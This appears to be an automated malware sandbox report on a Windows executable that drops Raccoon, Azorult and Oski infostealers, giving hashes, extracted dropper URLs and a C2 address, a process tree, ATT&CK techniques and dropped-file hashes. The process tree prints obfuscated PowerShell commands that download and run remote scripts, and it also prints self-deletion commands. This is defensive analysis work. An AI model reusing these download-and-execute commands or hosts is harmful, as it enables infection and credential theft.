Analysis

  • max time kernel
    155s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    02-09-2021 18:47

General

  • Target

    BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe

  • Size

    68KB

  • MD5

    468832921f562702e1c628d7778a776b

  • SHA1

    2501d72b98b8778858c3aad60a422f19fb423908

  • SHA256

    bd3cefcbb135df48caee6888747542a304c4706e24e93492c481201c556bf334

  • SHA512

    3c10dcc763e80df8db72d304769dcc66153dd2ee4916e8eebb12d88b89c16d73f8f8bc618fe4f312ac6e3c56ffb28be0d192bf6c1242c64b56dd7cdc361c2797

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://bit.do/eVtV2

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://dgdfasddfs.ru/pps.ps1

Extracted

Family

raccoon

Botnet

43aae292cfe6f58a13bd7111bdd7d5ded5b23ec3

Attributes
  • url4cnc

    https://telete.in/brikitiki

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe
    "C:\Users\Admin\AppData\Local\Temp\BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:900
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E871.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2088
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $lp=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $lp;$lz=((New-Object Net.WebClient)).DownloadString('http://bit.do/eVtV2');s $lz
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2864
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $zr=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $zr;$jr=((New-Object Net.WebClient)).DownloadString('http://dgdfasddfs.ru/pps.ps1');s $jr
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:184
        • C:\Users\Public\zpd.exe
          "C:\Users\Public\zpd.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4072
          • C:\Users\Public\zpd.exe
            "C:\Users\Public\zpd.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2824
            • C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
              "C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 0
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3992
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:584
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1500
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3904
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1872
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2428
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2948
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:396
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                7⤵
                  PID:4076
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4024
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                  7⤵
                    PID:988
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dewgkwlbhkrsncbybkhtfpkb.vbs"
                    7⤵
                      PID:3396
                      • C:\Users\Admin\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
                        "C:\Users\Admin\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe"
                        8⤵
                        • Executes dropped EXE
                        PID:2120
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                          9⤵
                            PID:184
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                            9⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1800
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                            9⤵
                              PID:1016
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                              9⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4064
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                              9⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:500
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                              9⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3740
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                10⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:988
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                              9⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2076
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                              9⤵
                                PID:3884
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                9⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2144
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                9⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2868
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ddmmvlnwvosotwcisp.vbs"
                                9⤵
                                  PID:1816
                                  • C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2644
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1300
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1224
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1308
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3980
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4036
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:804
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3828
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1756
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2080
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      11⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2860
                                    • C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
                                      C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
                                      11⤵
                                      • Executes dropped EXE
                                      PID:1256
                                    • C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
                                      C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
                                      11⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of SetThreadContext
                                      • Checks processor information in registry
                                      • Suspicious behavior: MapViewOfSection
                                      PID:1320
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 1320 & erase C:\Users\Admin\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe & RD /S /Q C:\\ProgramData\\480870627578018\\* & exit
                                        12⤵
                                          PID:3356
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /pid 1320
                                            13⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2592
                                  • C:\Users\Admin\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
                                    C:\Users\Admin\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
                                    9⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4012
                              • C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
                                C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
                                7⤵
                                  PID:1756
                                • C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
                                  C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2864
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"
                                    8⤵
                                      PID:2180
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        9⤵
                                        • Delays execution with timeout.exe
                                        PID:1296
                                • C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
                                  "C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 0
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:492
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                    7⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4000
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                    7⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2108
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                    7⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2368
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                    7⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3128
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                    7⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2192
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                    7⤵
                                      PID:4012
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      7⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:740
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                      7⤵
                                        PID:1000
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                        7⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2808
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                        7⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4076
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          8⤵
                                            PID:3396
                                        • C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
                                          C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
                                          7⤵
                                          • Executes dropped EXE
                                          PID:3996
                                      • C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
                                        "C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 0
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:1320
                                        • C:\Users\Admin\AppData\Local\Temp\vcxfse.exe
                                          "C:\Users\Admin\AppData\Local\Temp\vcxfse.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: MapViewOfSection
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2160
                                          • C:\Users\Admin\AppData\Local\Temp\vcxfse.exe
                                            "C:\Users\Admin\AppData\Local\Temp\vcxfse.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3884
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 3884 & erase C:\Users\Admin\AppData\Local\Temp\vcxfse.exe & RD /S /Q C:\\ProgramData\\592163316800894\\* & exit
                                              9⤵
                                                PID:1000
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /pid 3884
                                                  10⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4028
                                          • C:\Users\Admin\AppData\Local\Temp\cbvjns.exe
                                            "C:\Users\Admin\AppData\Local\Temp\cbvjns.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: MapViewOfSection
                                            • Suspicious use of SetWindowsHookEx
                                            PID:1052
                                            • C:\Users\Admin\AppData\Local\Temp\cbvjns.exe
                                              "C:\Users\Admin\AppData\Local\Temp\cbvjns.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              PID:3932
                                          • C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
                                            "C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:972
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"
                                              8⤵
                                                PID:1104
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /T 10 /NOBREAK
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:3808
                                          • C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
                                            "C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 0
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4068
                                    • C:\Users\Admin\AppData\Local\Temp\E871.tmp\UNGActivator.exe
                                      UNGActivator.exe
                                      3⤵
                                      • Executes dropped EXE
                                      PID:1432
                                • C:\Windows\system32\DllHost.exe
                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                  1⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:184

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Credential Access

                                Credentials in Files

                                3
                                T1081

                                Discovery

                                Query Registry

                                2
                                T1012

                                System Information Discovery

                                2
                                T1082

                                Collection

                                Data from Local System

                                3
                                T1005

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\LocalLow\aD1rF3aM8r\mozglue.dll
                                  MD5

                                  eae9273f8cdcf9321c6c37c244773139

                                  SHA1

                                  8378e2a2f3635574c106eea8419b5eb00b8489b0

                                  SHA256

                                  a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

                                  SHA512

                                  06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

                                • C:\Users\Admin\AppData\LocalLow\aD1rF3aM8r\nss3.dll
                                  MD5

                                  02cc7b8ee30056d5912de54f1bdfc219

                                  SHA1

                                  a6923da95705fb81e368ae48f93d28522ef552fb

                                  SHA256

                                  1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                                  SHA512

                                  0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                                • C:\Users\Admin\AppData\LocalLow\aD1rF3aM8r\softokn3.dll
                                  MD5

                                  4e8df049f3459fa94ab6ad387f3561ac

                                  SHA1

                                  06ed392bc29ad9d5fc05ee254c2625fd65925114

                                  SHA256

                                  25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

                                  SHA512

                                  3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                  MD5

                                  7101152facc6ee78d3e68728fa8ddc5e

                                  SHA1

                                  1171b17ed31884bda88bbafd662ea6242e9510e9

                                  SHA256

                                  7f2666a2c060e453c303c8203501e8963923cc587a58d1418c7733e94ad821f5

                                  SHA512

                                  837143fd5b8d01605fad407e9fbdb9e601f2894b1b5eab7562d381a69aa25a1018e22d138107693a50027135bac0e053cd6878dd0cad3bdf4d078aa069efacab

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  MD5

                                  376f8df341c456a3e55ccf5e86bfb0f0

                                  SHA1

                                  5051128ce3c7163f549f894f953704b300323543

                                  SHA256

                                  df49166dae5067a88c48d4b667243f239e778fddf82497c5c0f26e32fdf01831

                                  SHA512

                                  9ff62c60dd4595be9b222f5c6a68d31cc6d99b9608861fc0e589364532434a914425bd816ac90a6fae35646fa55b1cc4927c4c18c5e75b922fcc6fc67bf41a74

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  MD5

                                  376f8df341c456a3e55ccf5e86bfb0f0

                                  SHA1

                                  5051128ce3c7163f549f894f953704b300323543

                                  SHA256

                                  df49166dae5067a88c48d4b667243f239e778fddf82497c5c0f26e32fdf01831

                                  SHA512

                                  9ff62c60dd4595be9b222f5c6a68d31cc6d99b9608861fc0e589364532434a914425bd816ac90a6fae35646fa55b1cc4927c4c18c5e75b922fcc6fc67bf41a74

                                • C:\Users\Admin\AppData\Local\Temp\Ddmmvlnwvosotwcisp.vbs
                                  MD5

                                  8e6ed0e063f11f70636a3f17f2a6ff0a

                                  SHA1

                                  4eb2da6280255683781c4b2e3e2e77de09d7d3ba

                                  SHA256

                                  bfd0eeb6d76e800e9fc6ffc2924ed0f8a4562bd2446ec503362ed325094e7561

                                  SHA512

                                  061a55f826961a96609717eb173b3f4bade372e4e26f9eae6b84f45b2bcdb97687e7d79b6d450f6a92a9805c799f623a04c7bb59550e2027ba3cf5d172a34e0e

                                • C:\Users\Admin\AppData\Local\Temp\Dewgkwlbhkrsncbybkhtfpkb.vbs
                                  MD5

                                  eedf5b01d8c6919df80fb4eeef481b96

                                  SHA1

                                  c2f13824ede4e9781aa1d231c3bfe65ee57a5202

                                  SHA256

                                  c470d243098a7051aa0914fcda227fa4ae3b752556a5de16da5d73a169005aa4

                                  SHA512

                                  c9db4dff46d7517270dda041eca132368edc87bac7d0926b5179d7c385696a7b648c2b99bb444a08c60c95fd4dbd01700f17a8c9cb678bef680a8f681d248822

                                • C:\Users\Admin\AppData\Local\Temp\E871.tmp\UNGActivator.exe
                                  MD5

                                  cba6e5a64b14be06310955c9f69a3262

                                  SHA1

                                  f478bc12a137571dd28fe982c92b1549c5ac3248

                                  SHA256

                                  757bf6e3803b114551566b24ce20a675c86f8db50afbef0966a82dd7f987c960

                                  SHA512

                                  776e554c2f0487bb4e06a8fb9b18357d8444c074b9f0c32bfb26c8338513900635a58bc4c294aeba1a5f056f27783af760d90e9478ff0810db5368d99edefad4

                                • C:\Users\Admin\AppData\Local\Temp\E871.tmp\a1.lnk
                                  MD5

                                  0637586181e23525e96771a7c145aaa7

                                  SHA1

                                  9720c9ac9cb90a97d548cdf0883a8f16c397821f

                                  SHA256

                                  0dffaa85047acc241ca76696cdd898cc55504fd5486ecd5ae006a7c64dcad55f

                                  SHA512

                                  d97ecf221bbdc32071edbf211f4845a665276f7432b5695b6857c2fffecb15e98fef315b7df6c5e3fb92ef0df57a4e3ad1c0335757a842d1bb3be67627d11247

                                • C:\Users\Admin\AppData\Local\Temp\E871.tmp\a2.lnk
                                  MD5

                                  ecb36823ec5d80821b9ce4701fba1c37

                                  SHA1

                                  d3eb36d8f36af4d35f016180d5ae70d9de0d1d26

                                  SHA256

                                  9a0bb2589738aceeacbf239c6339da2cb8c43eb74faf4008f63e703efeba37e8

                                  SHA512

                                  627d780d7ac6acf0bdea1d04ed71ad15e57d63c5800fa85c23f91422ee00a9dcb439fdceaa71649f1671f3164bb42a638e7ff06701b17a1edd6e5aa9903a318a

                                • C:\Users\Admin\AppData\Local\Temp\E871.tmp\start.bat
                                  MD5

                                  9f198b14c64e6ec15e04ed5cdc28581f

                                  SHA1

                                  acbe83a48e303e12a330d14ba89f1113a17e8d25

                                  SHA256

